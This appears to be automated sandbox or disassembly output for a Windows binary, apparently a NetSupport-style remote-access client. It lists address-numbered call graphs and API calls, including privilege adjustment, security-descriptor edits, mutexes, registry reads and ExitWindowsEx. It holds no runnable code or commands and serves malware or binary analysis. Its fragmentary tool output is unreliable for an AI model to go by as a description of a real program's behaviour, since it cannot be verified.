78846 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78844->78846 78845->78844 78847 1113f8a0 std::_Mutex::_Mutex 8 API calls 78845->78847 78849 1114200c 78846->78849 78848 11141fe9 78847->78848 78848->78844 78850 11141ff0 78848->78850 78849->78519 78851 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 78850->78851 78852 11141ffc 78851->78852 78852->78519 79379->78516 79401->78837 80795 110400d8 80805 110f8740 GetTokenInformation 80795->80805 80797 110400ea CloseHandle 80798 11040101 80797->80798 80799 110f8740 15 API calls 80798->80799 80800 1104019a 80799->80800 80801 110401a2 CloseHandle 80800->80801 80802 110401a9 80800->80802 80801->80802 80803 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80802->80803 80804 110401e7 80803->80804 80806 110f8788 80805->80806 80807 110f8777 80805->80807 80815 110efc70 9 API calls 80806->80815 80808 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80807->80808 80810 110f8784 80808->80810 80810->80797 80811 110f87ac 80811->80807 80812 110f87b4 80811->80812 80813 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80812->80813 80814 110f87da 80813->80814 80814->80797 80815->80811 80816 11170208 80817 11167f85 __getptd 62 API calls 80816->80817 80818 11170225 _LcidFromHexString 80817->80818 80819 11170232 GetLocaleInfoA 80818->80819 80820 11170265 80819->80820 80821 11170259 80819->80821 80839 11160e4e 81 API calls 2 library calls 80820->80839 80823 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80821->80823 80825 111703d5 80823->80825 80824 11170271 80826 1117027b GetLocaleInfoA 80824->80826 80836 111702ab _LangCountryEnumProc@4 _strlen 80824->80836 80826->80821 80827 1117029a 80826->80827 80840 11160e4e 81 API calls 2 library calls 80827->80840 80828 1117031e GetLocaleInfoA 80828->80821 80830 11170341 80828->80830 80842 11160e4e 81 API calls 2 library calls 80830->80842 80832 111702a5 80832->80836 80841 1115ff54 81 API calls 2 library calls 80832->80841 80833 1117034c 80833->80821 80837 11170354 _strlen 80833->80837 80843 11160e4e 81 API calls 2 library calls 80833->80843 80836->80821 80836->80828 80837->80821 80844 111701ad GetLocaleInfoW _GetPrimaryLen _strlen 80837->80844 80839->80824 80840->80832 80841->80836 80842->80833 80843->80837 80844->80821 80845 401020 GetCommandLineA 80847 401032 GetStartupInfoA 80845->80847 80848 401086 GetModuleHandleA 80847->80848 80852 401000 _NSMClient32 80848->80852 80851 4010a8 ExitProcess 80852->80851 80853 110259a0 LoadLibraryA 80854 110259e0 80855 110259ee GetProcAddress 80854->80855 80856 110259ff 80854->80856 80855->80856 80857 11025a18 80856->80857 80858 11025a0c K32GetProcessImageFileNameA 80856->80858 80860 11025a1e GetProcAddress 80857->80860 80861 11025a2f 80857->80861 80858->80857 80859 11025a51 80858->80859 80860->80861 80862 11025a36 80861->80862 80863 11025a47 SetLastError 80861->80863 80863->80859 80864 11140870 80865 11140881 80864->80865 80878 11140290 80865->80878 80869 11140905 80872 11140922 80869->80872 80874 11140904 80869->80874 80870 111408cb 80871 111408d2 ResetEvent 80870->80871 80886 11140450 261 API calls 2 library calls 80871->80886 80874->80869 80887 11140450 261 API calls 2 library calls 80874->80887 80875 111408e6 SetEvent WaitForMultipleObjects 80875->80871 80875->80874 80877 1114091f 80877->80872 80879 1114029c GetCurrentProcess 80878->80879 80880 111402bf 80878->80880 80879->80880 80881 111402ad GetModuleFileNameA 80879->80881 80882 1110c420 std::_Mutex::_Mutex 259 API calls 80880->80882 80884 111402e9 WaitForMultipleObjects 80880->80884 80881->80880 80883 111402db 80882->80883 80883->80884 80888 1113fbe0 GetModuleFileNameA 80883->80888 80884->80869 80884->80870 80886->80875 80887->80877 80889 1113fc63 80888->80889 80890 1113fc23 80888->80890 80893 1113fc89 GetModuleHandleA GetProcAddress 80889->80893 80894 1113fc6f LoadLibraryA 80889->80894 80891 11080be0 std::_Mutex::_Mutex IsDBCSLeadByte 80890->80891 80892 1113fc31 80891->80892 80892->80889 80895 1113fc38 LoadLibraryA 80892->80895 80897 1113fcb7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80893->80897 80898 1113fca9 80893->80898 80894->80893 80896 1113fc7e LoadLibraryA 80894->80896 80895->80889 80896->80893 80899 1113fce3 10 API calls 80897->80899 80898->80899 80900 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80899->80900 80901 1113fd60 80900->80901 80901->80884 80902 1104cea0 80911 1104cede _strncpy 80902->80911 80919 1104cf7e 80902->80919 80904 1104cf9f 80905 1104d018 80904->80905 80907 1104cfa6 80904->80907 80906 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80905->80906 80908 1104d02a 80906->80908 80907->80907 80909 1104cffc 80907->80909 80920 11086e70 80907->80920 80910 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80909->80910 80913 1104d014 80910->80913 80911->80905 80915 11080c50 82 API calls 80911->80915 80917 1104cf3c _strncpy 80915->80917 80916 1113e8f0 std::_Mutex::_Mutex 261 API calls 80916->80909 80917->80905 80918 1102a620 276 API calls 80917->80918 80918->80919 80945 11049da0 312 API calls 7 library calls 80919->80945 80946 11087510 80920->80946 80922 11086ebb 80951 11087640 265 API calls _sprintf 80922->80951 80924 11086eea 80925 11086ef0 80924->80925 80926 11086f04 _memset 80924->80926 80952 110290f0 261 API calls 2 library calls 80925->80952 80953 1113ee60 8 API calls 3 library calls 80926->80953 80930 11086f2b 80954 11143f40 261 API calls std::_Mutex::_Mutex 80930->80954 80932 11086f84 80933 11086fa1 80932->80933 80934 11086fb5 80932->80934 80955 110290f0 261 API calls 2 library calls 80933->80955 80935 111415b0 8 API calls 80934->80935 80937 11086fc5 80935->80937 80939 1115f3b5 _free 23 API calls 80937->80939 80940 11086fcb std::ios_base::_Ios_base_dtor 80939->80940 80956 110875d0 FreeLibrary std::ios_base::_Ios_base_dtor 80940->80956 80942 11086ff6 80943 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80942->80943 80944 1104cfee 80943->80944 80944->80916 80945->80904 80957 1115e4f0 80946->80957 80951->80924 80953->80930 80954->80932 80956->80942 80958 11087534 InitializeCriticalSection 80957->80958 80959 11087380 80958->80959 80960 11142150 267 API calls 80959->80960 80961 110873b3 80960->80961 80962 110874b8 80961->80962 80963 1110c420 std::_Mutex::_Mutex 261 API calls 80961->80963 80962->80922 80964 11087409 80963->80964 80965 1108744d 80964->80965 80966 11087436 80964->80966 80972 11085840 80965->80972 81001 110290f0 261 API calls 2 library calls 80966->81001 80970 11142150 267 API calls 80971 11087458 80970->80971 80971->80962 80971->80970 80971->80971 80973 1108585b 80972->80973 80974 1108585f 80973->80974 80975 11085870 80973->80975 80976 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80974->80976 80977 11141240 std::_Mutex::_Mutex 261 API calls 80975->80977 80978 1108586c 80976->80978 80979 11085877 80977->80979 80978->80971 80979->80979 80980 1108589b LoadLibraryA 80979->80980 80981 11085939 GetProcAddress 80980->80981 80982 110858d4 80980->80982 80985 110859dc 80981->80985 80986 11085954 GetProcAddress 80981->80986 80983 110858dd GetModuleFileNameA 80982->80983 80984 11085930 80982->80984 80987 11080be0 std::_Mutex::_Mutex IsDBCSLeadByte 80983->80987 80984->80981 80984->80985 80989 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80985->80989 80986->80985 80988 11085965 GetProcAddress 80986->80988 80990 110858fe LoadLibraryA 80987->80990 80988->80985 80991 11085976 GetProcAddress 80988->80991 80992 110859ea 80989->80992 80990->80984 80991->80985 80993 11085987 GetProcAddress 80991->80993 80992->80971 80993->80985 80994 11085998 GetProcAddress 80993->80994 80994->80985 80995 110859a9 GetProcAddress 80994->80995 80995->80985 80996 110859ba GetProcAddress 80995->80996 80996->80985 80997 110859cb GetProcAddress 80996->80997 80997->80985 80998 110859ee 80997->80998 80999 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 80998->80999 81000 11085a00 80999->81000 81000->80971 81002 110302a9 81003 1113f670 std::_Mutex::_Mutex RegQueryValueExA 81002->81003 81004 110302d1 81003->81004 81005 110303bc RegCloseKey 81004->81005 81006 1115f5b7 std::_Mutex::_Mutex 75 API calls 81004->81006 81007 110303e6 81005->81007 81008 110302e5 81006->81008 81009 110303ed 81007->81009 81011 110304d1 81007->81011 81010 111601fd std::_Mutex::_Mutex 75 API calls 81008->81010 81014 1110c420 std::_Mutex::_Mutex 261 API calls 81009->81014 81012 110302f4 81010->81012 81013 1110c420 std::_Mutex::_Mutex 261 API calls 81011->81013 81015 11030312 81012->81015 81019 111601fd std::_Mutex::_Mutex 75 API calls 81012->81019 81016 110304d8 81013->81016 81017 11030414 81014->81017 81021 1115f5b7 std::_Mutex::_Mutex 75 API calls 81015->81021 81084 110f8130 268 API calls std::_Mutex::_Mutex 81016->81084 81018 11105d40 443 API calls 81017->81018 81022 11030430 GetStockObject GetObjectA 81018->81022 81019->81012 81025 1103031e 81021->81025 81024 11030696 SetErrorMode SetErrorMode 81022->81024 81028 1110c420 std::_Mutex::_Mutex 261 API calls 81024->81028 81025->81005 81027 1113f670 std::_Mutex::_Mutex RegQueryValueExA 81025->81027 81029 11030374 81027->81029 81030 110306d2 81028->81030 81031 1113f670 std::_Mutex::_Mutex RegQueryValueExA 81029->81031 81033 11027fe0 264 API calls 81030->81033 81032 1103039d 81031->81032 81032->81005 81034 110306ec 81033->81034 81035 1110c420 std::_Mutex::_Mutex 261 API calls 81034->81035 81036 11030712 81035->81036 81037 11027fe0 264 API calls 81036->81037 81038 1103072b InterlockedExchange 81037->81038 81040 1110c420 std::_Mutex::_Mutex 261 API calls 81038->81040 81041 11030753 81040->81041 81042 11089840 263 API calls 81041->81042 81043 1103076b GetACP 81042->81043 81045 1115f8a3 _sprintf 93 API calls 81043->81045 81046 11030792 81045->81046 81047 11161c63 _setlocale 97 API calls 81046->81047 81048 1103079c 81047->81048 81049 1113f220 82 API calls 81048->81049 81050 110307c8 81049->81050 81051 1110c420 std::_Mutex::_Mutex 261 API calls 81050->81051 81052 110307e8 81051->81052 81053 11060520 261 API calls 81052->81053 81054 11030813 81053->81054 81055 1103083a 81054->81055 81057 1110c420 std::_Mutex::_Mutex 261 API calls 81054->81057 81056 110cb920 4 API calls 81055->81056 81058 11030886 81056->81058 81057->81055 81059 1110c420 std::_Mutex::_Mutex 261 API calls 81058->81059 81060 1103088d 81059->81060 81061 110308e0 81060->81061 81062 11030967 81060->81062 81063 1110c420 std::_Mutex::_Mutex 261 API calls 81061->81063 81068 11030965 std::ios_base::_Ios_base_dtor 81062->81068 81087 11121fc0 430 API calls 81062->81087 81064 110308e7 81063->81064 81067 110308ff 81064->81067 81070 110879a0 264 API calls 81064->81070 81066 1100d500 FreeLibrary 81069 11030980 81066->81069 81071 1110c420 std::_Mutex::_Mutex 261 API calls 81067->81071 81068->81066 81072 1100d220 wsprintfA 81069->81072 81076 11030999 81069->81076 81070->81067 81073 11030916 81071->81073 81074 1103098e 81072->81074 81080 1103093a 81073->81080 81085 1105b8c0 294 API calls 81073->81085 81075 11142a60 std::_Mutex::_Mutex 21 API calls 81074->81075 81075->81076 81077 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 81076->81077 81079 11030aff 81077->81079 81086 1105bcb0 422 API calls 81080->81086 81082 11030960 81083 11026e20 118 API calls 81082->81083 81083->81068 81084->81022 81085->81080 81086->81082 81087->81068 81088 1102ce2d InterlockedIncrement 81089 1102ce59 GetCurrentProcess SetPriorityClass 81088->81089 81090 1102ce3c 81088->81090 81092 1102ce8d 81089->81092 81091 11142a60 std::_Mutex::_Mutex 21 API calls 81090->81091 81093 1102ce46 81091->81093 81094 1102ce96 SetEvent 81092->81094 81097 1102ce9d 81092->81097 81095 1102ce50 Sleep 81093->81095 81094->81097 81095->81095 81096 1102ced4 81098 1102cf02 81096->81098 81185 1109e4e0 271 API calls std::_Mutex::_Mutex 81096->81185 81097->81096 81183 11029010 275 API calls 2 library calls 81097->81183 81186 11028b10 496 API calls std::_Mutex::_Mutex 81098->81186 81102 1102cebd 81184 110fd040 274 API calls 2 library calls 81102->81184 81103 1102cf13 81166 11027d00 SetEvent 81103->81166 81106 1102cf18 81107 1102cf22 81106->81107 81108 1102cf4f 81106->81108 81107->81106 81187 11058ac0 SetEvent 81107->81187 81109 1102cf57 81108->81109 81110 1102cf8e 81108->81110 81109->81110 81117 1102cf83 Sleep 81109->81117 81112 11142a60 std::_Mutex::_Mutex 21 API calls 81110->81112 81113 1102cf98 81112->81113 81114 1102cfa5 81113->81114 81115 1102cfd6 81113->81115 81114->81113 81118 1105d340 75 API calls 81114->81118 81116 1102cfd3 81115->81116 81167 110af250 81115->81167 81116->81115 81117->81110 81119 1102cfc8 81118->81119 81119->81115 81188 1102cc30 290 API calls std::_Mutex::_Mutex 81119->81188 81126 1102d01a 81127 1102d02d 81126->81127 81190 11132620 295 API calls 5 library calls 81126->81190 81128 1100d500 FreeLibrary 81127->81128 81130 1102d339 81128->81130 81131 1102d350 81130->81131 81132 1100d220 wsprintfA 81130->81132 81135 1102d377 GetModuleFileNameA GetFileAttributesA 81131->81135 81143 1102d493 81131->81143 81133 1102d345 81132->81133 81134 11142a60 std::_Mutex::_Mutex 21 API calls 81133->81134 81134->81131 81136 1102d39f 81135->81136 81135->81143 81138 1110c420 std::_Mutex::_Mutex 261 API calls 81136->81138 81137 11142a60 std::_Mutex::_Mutex 21 API calls 81139 1102d542 81137->81139 81141 1102d3a6 81138->81141 81193 11142a20 FreeLibrary 81139->81193 81145 1113f0c0 263 API calls 81141->81145 81142 1102d54a 81144 1102d586 81142->81144 81146 1102d574 ExitWindowsEx 81142->81146 81147 1102d564 ExitWindowsEx Sleep 81142->81147 81143->81137 81148 1102d596 81144->81148 81149 1102d58b Sleep 81144->81149 81153 1102d3c8 81145->81153 81146->81144 81147->81146 81150 11142a60 std::_Mutex::_Mutex 21 API calls 81148->81150 81149->81148 81154 1113f220 82 API calls 81153->81154 81155 1102d3ed 81154->81155 81155->81143 81166->81106 81194 1107f690 81167->81194 81172 1102cffa 81176 110e8da0 81172->81176 81173 110af297 81206 110290f0 261 API calls 2 library calls 81173->81206 81177 110af250 263 API calls 81176->81177 81178 110e8dcd 81177->81178 81222 110e8170 81178->81222 81182 1102d005 81189 110af440 263 API calls std::_Mutex::_Mutex 81182->81189 81183->81102 81184->81096 81185->81098 81186->81103 81187->81108 81188->81116 81189->81126 81190->81127 81193->81142 81195 1107f6b4 81194->81195 81196 1107f6cf 81195->81196 81197 1107f6b8 81195->81197 81199 1107f6e8 81196->81199 81200 1107f6cc 81196->81200 81207 110290f0 261 API calls 2 library calls 81197->81207 81203 110af240 81199->81203 81200->81196 81208 110290f0 261 API calls 2 library calls 81200->81208 81209 11080370 81203->81209 81210 11080391 81209->81210 81211 110803bd 81209->81211 81210->81211 81212 110803ab 81210->81212 81213 1108040a wsprintfA 81211->81213 81214 110803e5 wsprintfA 81211->81214 81215 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 81212->81215 81221 110290f0 261 API calls 2 library calls 81213->81221 81214->81211 81217 110803b9 81215->81217 81217->81172 81217->81173 81224 110e817b 81222->81224 81223 110e8215 81232 110af440 263 API calls std::_Mutex::_Mutex 81223->81232 81224->81223 81225 110e819e 81224->81225 81226 110e81b5 81224->81226 81233 110290f0 261 API calls 2 library calls 81225->81233 81228 110e81b2 81226->81228 81229 110e81e2 SendMessageTimeoutA 81226->81229 81228->81226 81234 110290f0 261 API calls 2 library calls 81228->81234 81229->81223 81232->81182 81235 1110e460 81247 1110e3c0 GetSystemDirectoryA 81235->81247 81239 1110e525 81240 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 81239->81240 81241 1110e532 81240->81241 81242 1110e4bb 81242->81239 81243 1110e4f9 GetComputerNameA 81242->81243 81243->81239 81244 1110e512 81243->81244 81253 110cf020 265 API calls 2 library calls 81244->81253 81246 1110e522 81246->81239 81248 1110e40a __wsplitpath 81247->81248 81249 1110e419 GetVolumeInformationA 81248->81249 81250 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 81249->81250 81251 1110e450 81250->81251 81252 110cf020 265 API calls 2 library calls 81251->81252 81252->81242 81253->81246 81254 1102ff34 81255 1113f0c0 263 API calls 81254->81255 81256 1102ff42 81255->81256 81257 1113f220 82 API calls 81256->81257 81258 1102ff85 81257->81258 81259 1102ff9a 81258->81259 81260 11080c50 82 API calls 81258->81260 81261 110eaed0 8 API calls 81259->81261 81260->81259 81262 1102ffc5 81261->81262 81263 1103000c 81262->81263 81305 110eaf80 77 API calls 2 library calls 81262->81305 81267 1113f220 82 API calls 81263->81267 81265 1102ffda 81306 110eaf80 77 API calls 2 library calls 81265->81306 81269 11030021 81267->81269 81268 1102fff0 81268->81263 81270 111429e0 19 API calls 81268->81270 81271 1110c420 std::_Mutex::_Mutex 261 API calls 81269->81271 81270->81263 81272 11030030 81271->81272 81273 11030051 81272->81273 81274 110879a0 264 API calls 81272->81274 81275 11089840 263 API calls 81273->81275 81274->81273 81276 11030064 OpenMutexA 81275->81276 81277 11030083 CreateMutexA 81276->81277 81278 1103016c CloseHandle 81276->81278 81280 110300a5 81277->81280 81298 11089940 81278->81298 81281 1110c420 std::_Mutex::_Mutex 261 API calls 81280->81281 81286 110300ba 81281->81286 81282 11030182 81283 1115e4d1 __ehhandler$___std_fs_remove@4 5 API calls 81282->81283 81285 11030aff 81283->81285 81307 11015e10 LoadLibraryA 81286->81307 81287 110300ef 81288 11030103 GetProcAddress 81287->81288 81289 11030119 81287->81289 81288->81289 81290 1103011d SetLastError 81288->81290 81291 11027e10 47 API calls 81289->81291 81290->81289 81292 1103012a 81291->81292 81308 11009320 423 API calls std::_Mutex::_Mutex 81292->81308 81294 11030139 81295 11030142 WaitForSingleObject 81294->81295 81295->81295 81296 11030154 CloseHandle 81295->81296 81296->81278 81297 11030165 FreeLibrary 81296->81297 81297->81278 81299 110899e7 81298->81299 81303 1108997a std::ios_base::_Ios_base_dtor 81298->81303 81300 110899ee DeleteCriticalSection 81299->81300 81309 11139f90 81300->81309 81301 1108998e CloseHandle 81301->81303 81303->81299 81303->81301 81304 11089a14 std::ios_base::_Ios_base_dtor 81304->81282 81305->81265 81306->81268 81307->81287 81308->81294 81312 11139fa4 81309->81312 81310 11139fa8 81310->81304 81312->81310 81313 11139bb0 35 API calls 2 library calls 81312->81313 81313->81312 81314 1106fd70 81320 1106fda0 std::ios_base::_Ios_base_dtor 81314->81320 81315 1106ff03 81316 1106fdc2 Sleep EnterCriticalSection 81316->81320 81317 1106fe7e LeaveCriticalSection 81317->81320 81320->81315 81320->81316 81320->81317 81323 1106fedd 81320->81323 81324 1106ae60 294 API calls 81320->81324 81325 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 81320->81325 81323->81320 81326 1106e810 332 API calls 3 library calls 81323->81326 81327 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 81323->81327 81324->81320 81325->81320 81326->81323 81327->81323 81328 685963a0 81329 685963a5 81328->81329 81330 685963a9 WSACancelBlockingCall 81329->81330 81331 685963b1 Sleep 81329->81331 81332 685b5ae6 81333 685b5af1 ___security_init_cookie 81332->81333 81334 685b5af6 81332->81334 81333->81334 81337 685b59f0 81334->81337 81336 685b5b04 81338 685b59fc 81337->81338 81342 685b5a49 81338->81342 81343 685b5a99 81338->81343 81345 685b588c 81338->81345 81340 685b5a79 81341 685b588c __CRT_INIT@12 115 API calls 81340->81341 81340->81343 81341->81343 81342->81340 81342->81343 81344 685b588c __CRT_INIT@12 115 API calls 81342->81344 81343->81336 81344->81340 81346 685b5898 81345->81346 81347 685b591a 81346->81347 81348 685b58a0 81346->81348 81349 685b597b 81347->81349 81350 685b5920 81347->81350 81390 685b607f HeapCreate 81348->81390 81352 685b59d9 81349->81352 81353 685b5980 81349->81353 81356 685b593e 81350->81356 81381 685b58a9 81350->81381 81398 685b5e35 10 API calls _doexit 81350->81398 81354 685b59de __freeptd 81352->81354 81352->81381 81402 685b6da9 TlsGetValue DecodePointer TlsSetValue 81353->81402 81354->81381 81359 685b594d 81356->81359 81399 685b9b09 HeapFree GetLastError DeleteCriticalSection _free 81356->81399 81357 685b5985 __calloc_crt 81361 685b599d DecodePointer 81357->81361 81357->81381 81401 685b5965 6 API calls __mtterm 81359->81401 81367 685b59b2 81361->81367 81363 685b58a5 81365 685b58c0 __RTC_Initialize GetCommandLineA 81363->81365 81363->81381 81364 685b5948 81400 685b6dfa 6 API calls _free 81364->81400 81391 685bf016 8 API calls _free 81365->81391 81370 685b59cd 81367->81370 81371 685b59b6 81367->81371 81369 685b58d5 81392 685b98c4 9 API calls 81369->81392 81374 685b1bfd _free 2 API calls 81370->81374 81403 685b6e37 12 API calls 2 library calls 81371->81403 81374->81381 81375 685b58df 81377 685b58ea 81375->81377 81378 685b58e3 81375->81378 81376 685b59bd GetCurrentThreadId 81376->81381 81394 685bef5b 83 API calls 2 library calls 81377->81394 81393 685b6dfa 6 API calls _free 81378->81393 81381->81342 81382 685b58ef 81383 685b5903 81382->81383 81395 685becd4 75 API calls 4 library calls 81382->81395 81389 685b5908 81383->81389 81397 685b9b09 HeapFree GetLastError DeleteCriticalSection _free 81383->81397 81386 685b5918 81386->81378 81387 685b58f8 81387->81383 81396 685b5c32 EncodePointer __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 81387->81396 81389->81381 81390->81363 81391->81369 81392->81375 81393->81381 81394->81382 81395->81387 81396->81383 81397->81386 81398->81356 81399->81364 81400->81359 81401->81381 81402->81357 81403->81376

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 614 1109d4a0-1109d502 call 1109cc90 617 1109d508-1109d52b call 1109c750 614->617 618 1109db20 614->618 624 1109d531-1109d545 LocalAlloc 617->624 625 1109d694-1109d696 617->625 619 1109db22-1109db3d call 1115e4d1 618->619 627 1109d54b-1109d57d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 624->627 628 1109db15-1109db1b call 1109c7e0 624->628 626 1109d626-1109d64b CreateFileMappingA 625->626 630 1109d698-1109d6ab GetLastError 626->630 631 1109d64d-1109d66d GetLastError call 110ee9e0 626->631 632 1109d60a-1109d620 627->632 633 1109d583-1109d5ae call 1109c6c0 call 1109c700 627->633 628->618 635 1109d6ad 630->635 636 1109d6b2-1109d6c9 MapViewOfFile 630->636 646 1109d678-1109d680 631->646 647 1109d66f-1109d676 LocalFree 631->647 632->626 658 1109d5f9-1109d601 633->658 659 1109d5b0-1109d5e6 GetSecurityDescriptorSacl 633->659 635->636 639 1109d6cb-1109d6e6 call 110ee9e0 636->639 640 1109d707-1109d70f 636->640 661 1109d6e8-1109d6e9 LocalFree 639->661 662 1109d6eb-1109d6f3 639->662 644 1109d7b1-1109d7c3 640->644 645 1109d715-1109d72e GetModuleFileNameA 640->645 650 1109d809-1109d822 call 1115e4f0 GetTickCount 644->650 651 1109d7c5-1109d7c8 644->651 652 1109d7cd-1109d7e8 call 110ee9e0 645->652 653 1109d734-1109d73d 645->653 654 1109d682-1109d683 LocalFree 646->654 655 1109d685-1109d68f 646->655 647->646 679 1109d824-1109d829 650->679 663 1109d8af-1109d913 GetCurrentProcessId GetModuleFileNameA call 1109cb20 651->663 677 1109d7ea-1109d7eb LocalFree 652->677 678 1109d7ed-1109d7f5 652->678 653->652 664 1109d743-1109d746 653->664 654->655 657 1109db0e-1109db10 call 1109cbd0 655->657 657->628 658->632 671 1109d603-1109d604 FreeLibrary 658->671 659->658 670 1109d5e8-1109d5f3 SetSecurityDescriptorSacl 659->670 661->662 673 1109d6f8-1109d702 662->673 674 1109d6f5-1109d6f6 LocalFree 662->674 681 1109d91b-1109d932 CreateEventA 663->681 682 1109d915 663->682 667 1109d789-1109d7ac call 110ee9e0 call 1109cbd0 664->667 668 1109d748-1109d74c 664->668 667->644 668->667 676 1109d74e-1109d759 668->676 670->658 671->632 673->657 674->673 683 1109d760-1109d764 676->683 677->678 684 1109d7fa-1109d804 678->684 685 1109d7f7-1109d7f8 LocalFree 678->685 686 1109d82b-1109d83a 679->686 687 1109d83c 679->687 691 1109d934-1109d953 GetLastError * 2 call 110ee9e0 681->691 692 1109d956-1109d95e 681->692 682->681 689 1109d780-1109d782 683->689 690 1109d766-1109d768 683->690 684->657 685->684 686->679 686->687 693 1109d83e-1109d844 687->693 698 1109d785-1109d787 689->698 695 1109d76a-1109d770 690->695 696 1109d77c-1109d77e 690->696 691->692 699 1109d960 692->699 700 1109d966-1109d977 CreateEventA 692->700 701 1109d855-1109d8ad 693->701 702 1109d846-1109d853 693->702 695->689 703 1109d772-1109d77a 695->703 696->698 698->652 698->667 699->700 705 1109d979-1109d998 GetLastError * 2 call 110ee9e0 700->705 706 1109d99b-1109d9a3 700->706 701->663 702->693 702->701 703->683 703->696 705->706 708 1109d9ab-1109d9bd CreateEventA 706->708 709 1109d9a5 706->709 710 1109d9bf-1109d9de GetLastError * 2 call 110ee9e0 708->710 711 1109d9e1-1109d9e9 708->711 709->708 710->711 714 1109d9eb 711->714 715 1109d9f1-1109da02 CreateEventA 711->715 714->715 717 1109da24-1109da32 715->717 718 1109da04-1109da21 GetLastError * 2 call 110ee9e0 715->718 720 1109da34-1109da35 LocalFree 717->720 721 1109da37-1109da3f 717->721 718->717 720->721 723 1109da41-1109da42 LocalFree 721->723 724 1109da44-1109da4d 721->724 723->724 725 1109da53-1109da56 724->725 726 1109daf7-1109db09 call 110ee9e0 724->726 725->726 728 1109da5c-1109da5f 725->728 726->657 728->726 729 1109da65-1109da68 728->729 729->726 731 1109da6e-1109da71 729->731 732 1109da7c-1109da98 CreateThread 731->732 733 1109da73-1109da79 GetCurrentThreadId 731->733 734 1109da9a-1109daa4 732->734 735 1109daa6-1109dab0 732->735 733->732 734->657 736 1109daca-1109daf5 SetEvent call 110ee9e0 call 1109c7e0 735->736 737 1109dab2-1109dac8 ResetEvent * 3 735->737 736->619 737->736
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                          • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                          • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                          • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,7E4636A2,00080000,00000000,00000000), ref: 1109D535
                                                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
                                                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                        • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                        • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                        • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                          • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                          • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                        • _memset.LIBCMT ref: 1109D810
                                                                                                                        • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                        • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                        • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                        • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
